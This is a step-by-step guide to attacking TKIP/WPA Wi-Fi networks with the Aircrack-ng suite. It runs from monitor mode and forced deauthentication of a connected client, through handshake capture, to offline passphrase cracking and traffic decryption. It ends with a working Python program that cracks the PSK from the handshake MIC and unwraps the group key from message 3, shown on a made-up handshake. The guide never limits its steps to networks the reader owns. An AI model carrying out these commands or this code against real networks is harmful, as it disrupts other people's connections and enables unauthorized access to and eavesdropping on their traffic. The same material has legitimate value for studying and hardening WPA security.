TKIP Attack: Capturing Group Shared Keys

TL;DR

This guide shows how to capture the WPA/WPA2 4-way handshake of a TKIP-protected 802.11 network with the Aircrack-ng suite (airmon-ng, airodump-ng, aireplay-ng), so that the pre-shared key can be attacked offline. It also explains where the group temporal key (GTK, the TKIP group shared key) sits in that capture and why it can only be read once the pre-shared key is known.

Prerequisites

  • A wireless network interface capable of monitor mode and packet injection (e.g., Alfa AWUS036NHA).
  • The Aircrack-ng suite installed (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, airdecap-ng).
  • Root privileges on your Linux system.

Steps

  1. Put Your Wireless Interface into Monitor Mode

    First, identify your wireless interface name (e.g., wlan0). Then use the following command:

    sudo airmon-ng start wlan0

    This creates a monitor-mode interface (usually wlan0mon); note its name, because the remaining commands use it. airmon-ng also lists processes such as NetworkManager and wpa_supplicant that can knock the interface out of monitor mode; stop them before going further, or the capture will silently break.

  2. Scan for Target Networks

    Use airodump-ng to scan for networks. Its output lists each AP's BSSID, channel, encryption (look for TKIP in the CIPHER column), ESSID, and the stations associated with it:

    sudo airodump-ng wlan0mon

    Keep this running in one terminal window.

  3. Target a Specific Access Point (AP)

    From the airodump-ng output, identify the BSSID of your target AP and its channel. Then start capturing packets specifically for that network:

    sudo airodump-ng -c <channel> --bssid <BSSID> -w capture wlan0mon

    Replace <channel> with the AP's channel and <BSSID> with its MAC address. Locking to one channel matters: the handshake is only seen if the card is listening on the AP's channel at the moment the client authenticates. Captured packets are written to files whose names start with 'capture' (the first run produces capture-01.cap).

  4. Deauthenticate a Client

    The 4-way handshake is only sent when a client (re)associates, so rather than waiting for one, force an already connected client off the network: a deauthentication frame makes it disconnect, and most clients reconnect immediately, performing the handshake while airodump-ng is listening. Run this in a second terminal while the capture from step 3 keeps running:

    sudo aireplay-ng -0 1 -a <AP_BSSID> -c <Client_MAC> wlan0mon

    Replace <AP_BSSID> with the AP's MAC address and <Client_MAC> with the MAC of a station listed under that AP in the airodump-ng output. '-0 1' selects the deauthentication attack and sends one burst of deauthentication frames; a count of 0 sends them continuously. Pick a client you can actually hear (its packets show up in the airodump-ng station list): if the client is out of range, its reconnection frames never reach your card and no handshake is captured.

  5. Capture the Handshake

    Watch the top line of the airodump-ng output for 'WPA handshake: <BSSID>', which indicates that enough EAPOL-Key messages have been captured (both nonces and a MIC-protected message) for offline cracking. If it does not appear after a few seconds, repeat step 4. Deauthenticating too aggressively can keep the client from ever completing the handshake, so leave time between bursts.

  6. Locate the Group Shared Key (TKIP GTK) in the Capture

    The group temporal key is not sent in the clear, and there is no Aircrack-ng tool that pulls it straight out of a .cap file (packetforge-ng forges injectable frames such as ARP requests and has no key-extraction mode). The AP delivers the GTK to each client inside message 3 of the 4-way handshake (and again in a group key handshake whenever it rekeys), in the Key Data field of the EAPOL-Key frame. That field is encrypted with the KEK, a slice of the pairwise transient key (PTK); for TKIP (EAPOL-Key descriptor version 1) the wrapping is RC4 keyed with the frame's EAPOL-Key IV concatenated with the KEK, with the first 256 keystream bytes discarded. Because the PTK is derived from the pre-shared key and the nonces in messages 1 and 2, the GTK can only be recovered after the PSK has been cracked.

    You can confirm what you have by opening the capture in Wireshark and filtering on 'eapol': message 3 shows the Encrypted Key Data flag set and a non-empty Key Data field, whereas message 1 carries only the ANonce.

  7. Offline Cracking and Key Recovery

    Run aircrack-ng against the capture with a wordlist. For each candidate passphrase it derives the PMK (PBKDF2-HMAC-SHA1 over the passphrase and ESSID), computes the PTK from the captured nonces and MAC addresses, and accepts the passphrase whose KCK reproduces the MIC in message 2:

    sudo aircrack-ng -w wordlist.txt -b <BSSID> capture-01.cap

    Cracking speed is bound by PBKDF2 (4096 HMAC-SHA1 rounds per candidate), so a long random passphrase is out of reach of a wordlist. Once the passphrase is known, airdecap-ng recomputes the PTK from the handshake and decrypts the captured data frames, writing them to capture-01-dec.cap:

    sudo airdecap-ng -e <ESSID> -p <passphrase> capture-01.cap
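Steps 5 to 7 in working code. The example below is added here and is not code from the original article or from the Aircrack-ng project: it constructs a TKIP 4-way handshake (RSN key descriptor, EAPOL-Key descriptor version 1, the GTK carried as a KDE in message 3) and then does what aircrack-ng and airdecap-ng do with a real capture: it classifies the EAPOL-Key messages from their Key Information flags, recovers the PSK by recomputing the message 2 MIC for each wordlist candidate, derives the PTK, and RC4-unwraps the GTK from message 3. The SSID, passphrase, MAC addresses, nonces and GTK are all made up. A real capture would first need the EAPOL-Key frames cut out of the 802.11 data frames in the .cap file, which this example skips.

```python
"""Added example, not part of the original article: crack the PSK of a captured TKIP
4-way handshake and unwrap the GTK from message 3. All frames, addresses, nonces,
the SSID and the passphrase are constructed."""
import hashlib
import hmac
import struct

# Key Information bits of an EAPOL-Key frame (IEEE 802.11i) used below.
KEY_INFO_VERSION_MASK = 0x0007  # 1 = HMAC-MD5 MIC + RC4 key data (TKIP), 2 = HMAC-SHA1 + AES key wrap (CCMP)
KEY_INFO_PAIRWISE = 1 << 3
KEY_INFO_ACK = 1 << 7
KEY_INFO_MIC = 1 << 8
KEY_INFO_SECURE = 1 << 9
KEY_INFO_ENCRYPTED = 1 << 12

# 802.1X header plus EAPOL-Key descriptor fields up to and including Key Data Length (99 bytes).
HDR = struct.Struct(">BBHBHHQ32s16sQQ16sH")
MIC_OFF = 81  # offset of the 16-byte Key MIC field inside the frame


def build_eapol_key(key_info, replay, nonce, iv=b"\0" * 16, key_data=b""):
    """RSN (descriptor type 2) EAPOL-Key frame with a zeroed MIC; key length 32 = TKIP."""
    return HDR.pack(2, 3, HDR.size - 4 + len(key_data), 2, key_info, 32, replay,
                    nonce, iv, 0, 0, b"\0" * 16, len(key_data)) + key_data


def parse_eapol_key(frame):
    f = HDR.unpack_from(frame)
    return {"key_info": f[4], "replay": f[6], "nonce": f[7], "iv": f[8],
            "mic": f[11], "key_data": frame[HDR.size:HDR.size + f[12]]}


def classify(key_info):
    """Which handshake message a frame is, judged from its Key Information flags."""
    if not key_info & KEY_INFO_PAIRWISE:
        return "GROUP"  # group key handshake: a fresh GTK on rekey, also KEK-wrapped
    if key_info & KEY_INFO_ACK:
        return "M3" if key_info & KEY_INFO_MIC else "M1"
    return "M4" if key_info & KEY_INFO_SECURE else "M2"


def psk_to_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes); the cost of each guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def derive_ptk(pmk, aa, spa, anonce, snonce):
    """PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\0" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]  # KCK = [0:16], KEK = [16:32], TK = [32:64]


def eapol_mic(kck, frame, version):
    """Key MIC over the whole EAPOL frame with the MIC field zeroed."""
    zeroed = frame[:MIC_OFF] + b"\0" * 16 + frame[MIC_OFF + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(wordlist, ssid, aa, spa, m1, m2):
    """Offline dictionary attack: the passphrase whose KCK reproduces the MIC of message 2."""
    anonce, p2 = parse_eapol_key(m1)["nonce"], parse_eapol_key(m2)
    version = p2["key_info"] & KEY_INFO_VERSION_MASK
    for pw in wordlist:
        ptk = derive_ptk(psk_to_pmk(pw, ssid), aa, spa, anonce, p2["nonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], m2, version), p2["mic"]):
            return pw, ptk
    return None, None


def rc4(key, data, drop=256):
    """RC4 with the first 256 keystream bytes discarded, as 802.11i specifies for TKIP key-data wrapping."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for n in range(drop + len(data)):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        if n >= drop:
            out.append(data[n - drop] ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def parse_gtk_kde(key_data):
    """Find the GTK KDE (dd <len> 00-0F-AC 01 <keyid|tx> <reserved> <GTK>) in decrypted Key Data."""
    i = 0
    while i + 2 <= len(key_data):
        tag, length = key_data[i], key_data[i + 1]
        if tag == 0xDD and key_data[i + 2:i + 6] == b"\x00\x0f\xac\x01":
            return key_data[i + 6] & 0x03, key_data[i + 8:i + 2 + length]
        i += 2 + length
    return None


def demo():
    """Forge a TKIP handshake, then attack it as a capture; returns (psk, (key_id, gtk))."""
    ssid, passphrase = b"ExampleNet", "tkip-is-deprecated"                    # constructed
    aa, spa = bytes.fromhex("0011223344aa"), bytes.fromhex("66778899bbcc")     # AP / client MACs, constructed
    anonce, snonce, iv = bytes(range(32)), bytes(range(32, 64)), bytes(range(100, 116))
    gtk = bytes(range(200, 232))                                               # 256-bit TKIP group key to recover
    ptk = derive_ptk(psk_to_pmk(passphrase, ssid), aa, spa, anonce, snonce)   # what AP and client compute
    kck, kek = ptk[:16], ptk[16:32]
    m1 = build_eapol_key(0x0089, 1, anonce)                                    # version 1, pairwise, ACK
    m2 = build_eapol_key(0x0109, 1, snonce)                                    # pairwise, MIC
    m2 = m2[:MIC_OFF] + eapol_mic(kck, m2, 1) + m2[MIC_OFF + 16:]
    kde = b"\xdd" + bytes([6 + len(gtk)]) + b"\x00\x0f\xac\x01\x05\x00" + gtk  # key id 1, Tx bit set
    m3 = build_eapol_key(0x13C9, 2, anonce, iv=iv, key_data=rc4(iv + kek, kde))  # install, ACK, MIC, secure, encrypted
    m3 = m3[:MIC_OFF] + eapol_mic(kck, m3, 1) + m3[MIC_OFF + 16:]
    assert [classify(parse_eapol_key(m)["key_info"]) for m in (m1, m2, m3)] == ["M1", "M2", "M3"]
    # Attacker side: only the frames, the SSID and the MAC addresses are known.
    psk, ptk_found = crack_psk(["password", "letmein", passphrase, "12345678"], ssid, aa, spa, m1, m2)
    p3 = parse_eapol_key(m3)
    assert p3["key_info"] & KEY_INFO_ENCRYPTED                                 # no PSK, no readable Key Data
    return psk, parse_gtk_kde(rc4(p3["iv"] + ptk_found[16:32], p3["key_data"]))


if __name__ == "__main__":
    print(demo())
```

Everything the attacker needs is public in the capture except the passphrase, which is why the only defence at this layer is passphrase strength: each guess costs 4096 HMAC-SHA1 rounds plus a PRF-512, and the loop in crack_psk is exactly what aircrack-ng parallelises. The constants in classify are the same Key Information values Wireshark shows in its "Key Information" tree for each message.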
